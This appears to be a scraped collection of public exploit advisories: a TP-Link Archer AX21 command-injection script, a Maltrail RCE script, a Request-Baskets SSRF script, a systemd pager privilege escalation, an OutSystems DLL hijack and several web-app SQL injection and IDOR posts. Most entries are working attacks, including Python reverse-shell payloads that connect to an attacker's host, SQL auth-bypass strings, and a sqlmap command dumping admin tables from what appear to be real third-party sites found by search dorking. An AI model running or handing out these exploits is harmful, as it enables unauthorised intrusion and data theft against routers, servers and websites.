<pre><code>====================================================================================================================================<br />| # Title : Easy2Pilot V7 Auth By Pass Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit) | <br />| # Vendor : https://www.progetis.lu/easy2pilot/ | <br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Use payload : user & Pass : 1' or 1=1 -- -<br /><br />[+] http://127.0...1/easy2pilot-v7com/admin<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>#!/usr/bin/python3<br /># <br /># Exploit Title: TP-Link Archer AX21 - Unauthenticated Command Injection<br /># Date: 07/25/2023<br /># Exploit Author: Voyag3r (https://github.com/Voyag3r-Security)<br /># Vendor Homepage: https://www.tp-link.com/us/<br /># Version: TP-Link Archer AX21 (AX1800) firmware versions before 1.1.4 Build 20230219 (https://www.tenable.com/cve/CVE-2023-1389)<br /># Tested On: Firmware Version 2.1.5 Build 20211231 rel.73898(5553); Hardware Version Archer AX21 v2.0<br /># CVE: CVE-2023-1389<br />#<br /># Disclaimer: This script is intended to be used for educational purposes only.<br /># Do not run this against any system that you do not have permission to test. <br /># The author will not be held responsible for any use or damage caused by this <br /># program. <br /># <br /># CVE-2023-1389 is an unauthenticated command injection vulnerability in the web<br /># management interface of the TP-Link Archer AX21 (AX1800), specifically, in the<br /># *country* parameter of the *write* callback for the *country* form at the <br /># "/cgi-bin/luci/;stok=/locale" endpoint. By modifying the country parameter it is <br /># possible to run commands as root. Execution requires sending the request twice;<br /># the first request sets the command in the *country* value, and the second request <br /># (which can be identical or not) executes it. <br /># <br /># This script is a short proof of concept to obtain a reverse shell. To read more <br /># about the development of this script, you can read the blog post here:<br /># https://medium.com/@voyag3r-security/exploring-cve-2023-1389-rce-in-tp-link-archer-ax21-d7a60f259e94<br /># Before running the script, start a nc listener on your preferred port -> run the script -> profit<br /><br />import requests, urllib.parse, argparse<br />from requests.packages.urllib3.exceptions import InsecureRequestWarning<br /><br /># Suppress warning for connecting to a router with a self-signed certificate<br />requests.packages.urllib3.disable_warnings(InsecureRequestWarning)<br /><br /># Take user input for the router IP, and attacker IP and port<br />parser = argparse.ArgumentParser()<br /><br />parser.add_argument("-r", "--router", dest = "router", default = "192.168.0.1", help="Router name")<br />parser.add_argument("-a", "--attacker", dest = "attacker", default = "127.0.0.1", help="Attacker IP")<br />parser.add_argument("-p", "--port",dest = "port", default = "9999", help="Local port")<br /><br />args = parser.parse_args()<br /><br /># Generate the reverse shell command with the attacker IP and port<br />revshell = urllib.parse.quote("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc " + args.attacker + " " + args.port + " >/tmp/f")<br /><br /># URL to obtain the reverse shell<br />url_command = "https://" + args.router + "/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(" + revshell + ")"<br /><br /># Send the URL twice to run the command. Sending twice is necessary for the attack<br />r = requests.get(url_command, verify=False)<br />r = requests.get(url_command, verify=False)<br /> <br /><br /></code></pre>
<pre><code># Exploit Title: systemd 246 - Local Privilege Escalation<br /># Exploit Author: Iyaad Luqman K (init_6)<br /># Application: systemd 246<br /># Tested on: Ubuntu 22.04<br /># CVE: CVE-2023-26604<br /><br />systemd 246 was discovered to contain Privilege Escalation vulnerability, when the `systemctl status` command can be run as root user. <br />This vulnerability allows a local attacker to gain root privileges.<br /><br />## Proof Of Concept:<br />1. Run the systemctl command which can be run as root user.<br /><br />sudo /usr/bin/systemctl status any_service<br /><br />2. The ouput is opened in a pager (less) which allows us to execute arbitrary commands.<br /><br />3. Type in `!/bin/sh` in the pager to spawn a shell as root user.<br /><br /></code></pre>
<pre><code># Exploit Title: Maltrail v0.53 - Unauthenticated Remote Code Execution (RCE)<br /># Exploit Author: Iyaad Luqman K (init_6)<br /># Application: Maltrail v0.53<br /># Tested on: Ubuntu 22.04<br /># CVE: CVE-2023-27163<br /><br /><br /># PoC<br />import sys;<br />import os;<br />import base64;<br /><br />def main():<br /> listening_IP = None<br /> listening_PORT = None<br /> target_URL = None<br /><br /> if len(sys.argv) != 4:<br /> print("Error. Needs listening IP, PORT and target URL.")<br /> return(-1)<br /> <br /> listening_IP = sys.argv[1]<br /> listening_PORT = sys.argv[2]<br /> target_URL = sys.argv[3] + "/login"<br /> print("Running exploit on " + str(target_URL))<br /> curl_cmd(listening_IP, listening_PORT, target_URL)<br /><br />def curl_cmd(my_ip, my_port, target_url):<br /> payload = f'python3 -c \'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{my_ip}",{my_port}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")\''<br /> encoded_payload = base64.b64encode(payload.encode()).decode() # encode the payload in Base64<br /> command = f"curl '{target_url}' --data 'username=;`echo+\"{encoded_payload}\"+|+base64+-d+|+sh`'"<br /> os.system(command)<br /><br />if __name__ == "__main__":<br /> main()<br /> <br /></code></pre>
<pre><code># Exploit Title: Request-Baskets v1.2.1 - Server-side request forgery (SSRF)<br /># Exploit Author: Iyaad Luqman K (init_6)<br /># Application: Request-Baskets v1.2.1<br /># Tested on: Ubuntu 22.04<br /># CVE: CVE-2023-27163<br /><br /><br /># PoC<br />#!/bin/bash<br /><br /><br />if [ "$#" -lt 2 ] || [ "$1" = "-h" ] || [ "$1" = "--help" ]; then<br /> help="Usage: exploit.sh <URL> <TARGET>\n\n";<br /> help+="Arguments:\n" \<br /> help+=" URL main path (/) of the server (eg. http://127.0.0.1:5000/)\n";<br /> help+=" TARGET";<br /><br /> echo -e "$help";<br /> exit 1;<br />fi<br /><br />URL=$1<br />ATTACKER_SERVER=$2<br /><br />if [ "${URL: -1}" != "/" ]; then<br /> URL="$URL/";<br />fi;<br /><br />BASKET_NAME=$(LC_ALL=C tr -dc 'a-z' </dev/urandom | head -c "6");<br /><br />API_URL="$URL""api/baskets/$BASKET_NAME";<br /><br />PAYLOAD="{\"forward_url\": \"$ATTACKER_SERVER\",\"proxy_response\": true,\"insecure_tls\": false,\"expand_path\": true,\"capacity\": 250}";<br /><br />echo "> Creating the \"$BASKET_NAME\" proxy basket...";<br /><br />if ! response=$(curl -s -X POST -H 'Content-Type: application/json' -d "$PAYLOAD" "$API_URL"); then<br /> echo "> FATAL: Could not properly request $API_URL. Is the server online?";<br /> exit 1;<br />fi;<br /><br />BASKET_URL="$URL$BASKET_NAME";<br /><br />echo "> Basket created!";<br />echo "> Accessing $BASKET_URL now makes the server request to $ATTACKER_SERVER.";<br /><br />if ! jq --help 1>/dev/null; then<br /> echo "> Response body (Authorization): $response";<br />else<br /> echo "> Authorization: $(echo "$response" | jq -r ".token")";<br />fi;<br /><br />exit 0;<br /><br /></code></pre>
<pre><code># Exploit Title: OutSystems Service Studio 11.53.30 - DLL Hijacking<br /># Date: 2023-08-09<br /># Exploit Author: Carlo Di Dato for Deloitte Risk Advisory Italia<br /># Vendor Homepage: https://www.outsystems.com/<br /># Version: Up to 11.53.30 (Build 61739)<br /># Tested on: Windows<br /># CVE : CVE-2022-47636<br /><br />A DLL hijacking vulnerability has been discovered in OutSystems Service <br />Studio 11 11.53.30 build 61739.<br />When a user open a .oml file (OutSystems Modeling Language), the <br />application will load the following DLLs from the same directory:<br /><br />av_libGLESv2.dll<br />libcef.DLL<br />user32.dll<br />d3d10warp.dll<br /><br />Using a crafted DLL, it is possible to execute arbitrary code in the <br />context of the current logged in user.<br /><br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : i2soft CMS v2.0 Insecure Direct Object Reference Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit) | <br />| # Vendor : https://www.i2softbd.com/ | <br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] suffers from an insecure direct object reference that allows users to access the administrative interface.<br /><br />[+] use payload 1 : /Admin/menu.php<br /><br />[+] use payload 2 : Admin/container.php?p=../footer.html<br /><br />[+] now you can modify footer page or read other files<br /><br />[+] https://wtaazakhobor24com/Admin/container.php?p=../footer.html<br /><br />Greetings to :=================================================================<br />jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |<br />===============================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : helloGTX Travel Portal CRM v1.6 Insecure Direct Object Reference Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit) | <br />| # Vendor : https://www.hellogtx.com/ | <br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] suffers from an insecure direct object reference that allows users to access the administrative interface.<br /><br />[+] use payload : /admin/index/dashboard<br /><br />[+] Watch only without editing<br /><br />[+] https://wwholidaysbookerscom/admin/index/dashboard<br /><br />Greetings to :=================================================================<br />jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |<br />===============================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : FlatApp - Premium Admin Dashboard 1.0 SQL injection Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit) | <br />| # Vendor : https://themeforest.net/item/flatapp-premium-admin-dashboard-template/4961564?ref=pixelcave | <br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] use payload : /business-detail.php?lid=15003 <===== inject here <br /><br />[+] D:\sqlmap>sqlmap.py -u https://wwmrigindiacom/business-detail.php?lid=15003 --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 --dump -D mrigindi_new1 -T admin_login<br /><br />Greetings to :=================================================================<br />jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |<br />===============================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Greeva 2.0 Auth By Pass Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 115.0.2(64-bit) | <br />| # Vendor : https://coderthemes.com/greeva/index.html | <br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] use payload : user & pas = 1'or'1'='1<br /><br />[+] http://127.0.0.1/wsb-patho.com/sbpatho_system/pap_system/dist/auth-login.php<br /><br />Greetings to :=================================================================<br />jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |<br />===============================================================================<br /></code></pre>
